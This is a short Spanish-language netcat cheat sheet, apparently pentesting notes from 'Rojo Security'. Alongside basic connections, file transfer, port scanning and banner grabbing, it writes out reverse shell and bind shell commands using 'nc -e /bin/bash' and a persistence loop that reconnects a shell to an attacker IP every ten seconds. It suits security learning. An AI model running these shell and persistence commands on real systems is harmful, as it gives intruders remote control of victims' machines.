Rojo Security

ℹ️ Netcat es una herramienta de linea de comandos que permite leer y escribir datos a través de conexiones TCP y UDP. útil para hacer escaneo de puertos, transferencia de archivos, creación de shell reversas y comunicación entre host.

Instalación

apt install netcat

Uso básico de netcat

Conectar a un puerto abierto

nc 192.168.0.10 80

Escuchar en un puerto (modo servidor, netcat se pondra en escucha en el puerto 8000)

nc -lvp 8000

---

Transferencia de archivos

Enviar un archivo

nc 192.168.0.10 8000 < archivodesalida.txt

Recibir un archivo

nc -lvp 8000 > archivodeentrada.txt

---

Reverse Shell

ℹ️ La reverse shell comienza por una conexión directa desde la maquina victima hacía la maquina atacante, mientras tanto el atacante está escuchando en un puerto, una vez recibe la conexión por parte de la victima este obtiene una shell interactiva por parte de la victima.

Victima

nc -e /bin/bash 192.168.0.100 4444

Atacante

nc -lvp 4444

---

Bind Shell

ℹ️ La maquina victima abre un puerto en su sistema, el atacante debe conocer su dirección ip y el puerto al que desea conectarse y así conseguir una shell interactiva.

Victima

nc -lvp 4444 -e /bin/bash

Atacante

nc 192.168.0.100 4444

---

Escaneo de puertos

Escanea un rango de puertos | esto verificará los puerto que están abiertos entre 1 y 100 en el host 192.168.0.100

nc -zv 192.168.0.100 1-100

---

Persistencia con Netcat

Esto intentará reconectarse al atacante cada 10 segundos si la conexión se pierde.

while true; do nc -e /bin/bash <ATACANTE_IP> 4444; sleep 10; done

---

Banner Grabbing

ℹ️ Banner Grabbing Es un proceso sencillo que consiste en conectarse a un puerto específico de un servidor y esperar a que éste envíe un banner o mensaje de identificación del servicio al establecer la conexión.

Ejemplo para SSH (puerto 22) en la dirección IP 192.168.1.100:

nc 192.168.1.100 22

---

Conclusión

Netcat es una utilidad de red extremadamente versátil y poderosa, a menudo denominada la «navaja suiza» de las herramientas de red. Su capacidad para leer y escribir datos a través de conexiones de red TCP/IP y UDP desde la línea de comandos lo convierte en una herramienta invaluable para una amplia gama de tareas.